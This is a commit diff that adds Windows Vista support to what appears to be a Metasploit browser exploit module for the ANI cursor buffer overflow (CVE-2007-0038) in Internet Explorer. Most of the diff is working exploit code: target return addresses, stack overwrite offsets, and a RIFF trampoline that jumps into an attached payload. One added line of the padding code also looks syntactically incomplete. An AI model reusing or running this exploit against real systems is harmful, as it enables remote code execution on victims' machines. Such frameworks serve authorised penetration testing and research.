Merged in skape's Vista support, cleaned things up

git-svn-id: file:///home/svn/framework3/trunk@4593 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/browser/ani_loadimage_chunksize.rb

@@ -27,13 +27,12 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 			'Description'    => %q{
 				This module exploits a buffer overflow vulnerability in the 
 				LoadAniIcon() function of USER32.dll. The flaw is triggered
-				through Internet Explorer (6 and 7) using the CURSOR style sheet
+				through Internet Explorer (6 and 7) by using the CURSOR style sheet
 				directive to load a malicious .ANI file. Internet Explorer will catch any
 				exceptions that occur while the	invalid cursor is loaded, causing the 
 				exploit to silently fail when the wrong target has been chosen. This 
 				module will be updated in the near future to perform client-side 
-				fingerprinting and brute forcing. The underlying vulnerability all versions
-				of Windows between NT 4.0 and Vista.
+				fingerprinting and brute forcing.
 
 				This vulnerability was discovered by Alexander Sotirov of Determina
 				and was rediscovered, in the wild, by McAfee.  
@@ -41,7 +40,8 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'Author'         => 
 				[ 
-					'hdm',
+					'hdm',   # First version 
+					'skape', # Vista support
 				],
 			'Version'        => '$Revision$',
 			'References'     => 
@@ -71,7 +71,9 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					# All of these targets use call [ebx+4], just like the original exploit
+					#
+					# The following targets use call [ebx+4], just like the original exploit
+					#
 					
 					# Partial overwrite for cross-language exploitation (latest user32 only)
 					[ 'Windows XP SP2 user32.dll 5.1.2600.2622', { 'Ret' => 0x25ba, 'Len' => 2 }],
@@ -85,6 +87,22 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 					# Should work for English 2000 SP0-SP4+
 					[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }],					
 
+
+					#
+					# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start 
+					# of the RIFF itself. 
+					#
+					
+					# The RIFF magic bytes and the size of the riff file are
+					# executed which then bounce through.
+					#
+					# 1. Partial overwrite return with the address of a jmp dword [ebx]
+					# 2. Executes the first few bytes of the RIFF chunk and then
+					#    does a jmp $+0x16
+					# 3. Executes a relative jump to the start of the payload
+					#    itself.
+					[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ]
+
 				],
 			'DisclosureDate' => 'Mar 28 2007',
 			'DefaultTarget'  => 0))
@@ -143,7 +161,6 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 
 	def generate_ani(payload)
 
-
 		# Build the first ANI header
 		anih_a = [
 			36,            # DWORD cbSizeof
@@ -154,16 +171,35 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 			0, 0, 0,       # JIF jifRate
 			1              # DWORD flags
 		].pack('V9')
+		
+		anih_b = nil
 
-
-		# Build the second ANI header (ebp=76, eip=80)
-		anih_b = anih_a + rand_text(80-anih_a.length)
+		case target.name
+		when /Vista/		
+			# Vista has ebp=80, eip=84
+			anih_b         = anih_a + rand_text(84-anih_a.length)
+			
+			# Overwrite locals with invalid pointers
+			anih_b[68, 12] = [0x80000000 | rand(0xffffffff)].pack('V') * 3
+		else
+			# XP/2K has ebp=76 and eip=80
+			anih_b         = anih_a + rand_text(80-anih_a.length)
+			
+			# Overwrite locals with invalid pointers
+			anih_b[64, 12] = [0x80000000 | rand(0xffffffff)].pack('V') * 3
+		end
 
 		# Overwrite the return with address of a "call ptr [ebx+4]"
 		anih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4]
-		
+			
 		# Begin the ANI chunk
 		riff = "ACON"
+
+		if target.name =~ /Vista/
+			trampoline_doffset = riff.length + 8
+
+			riff << generate_trampoline_riff_chunk
+		end
 		
 		# Insert random RIFF chunks
 		0.upto(rand(128)+16) do |i|
@@ -180,21 +216,41 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 		
 		# Trigger the return address overwrite
 		riff << "anih" + [anih_b.length].pack('V') + anih_b
+
+		# If this is a Vista target, then we need to align the length of the
+		# RIFF chunk so that the low order two bytes are equal to a jmp $+0x16
+		if target.name =~ /Vista/
+			plen  = (riff.length & 0xffff0000) | 0x0eeb
+			plen += 0x10000 if (plen - 8) < riff.length
 	
+			riff << generate_riff_chunk((plen - 8) - riff.length)
+
+			# Replace the operand to the relative jump to point into the actual
+			# payload itself which comes after the riff chunk
+			riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
+		end
+
 		# Place the RIFF chunk in front and off we go
 		ret = "RIFF" + [riff.length].pack('V') + riff + payload.encoded
-
 	end
 
-	def generate_riff_chunk
+	# Generates a riff chunk with the first bytes of the data being a relative
+	# jump.  This is used to bounce to the actual payload
+	def generate_trampoline_riff_chunk
 		tag = Rex::Text.to_rand_case(rand_text_alpha(4))
-		dat = rand_text(rand(256)+1) * 2
+		dat = "\xe9\xff\xff\xff\xff" + rand_text(1) + (rand_text(rand(256)+1) * 2)
+		tag +	[dat.length].pack('V') + dat
+	end
+
+	def generate_riff_chunk(len = (rand(256)+1) * 2)
+		tag = Rex::Text.to_rand_case(rand_text_alpha(4))
+		dat = rand_text(len)
 		tag + [dat.length].pack('V') + dat
 	end
 	
 	def generate_css_padding
 		buf =
-			generate_whitespace() + 
+			((rand(2) == 0) ? generate_whitespace()) + 
 			"/*" + 
 			generate_whitespace() + 
 			generate_padding() +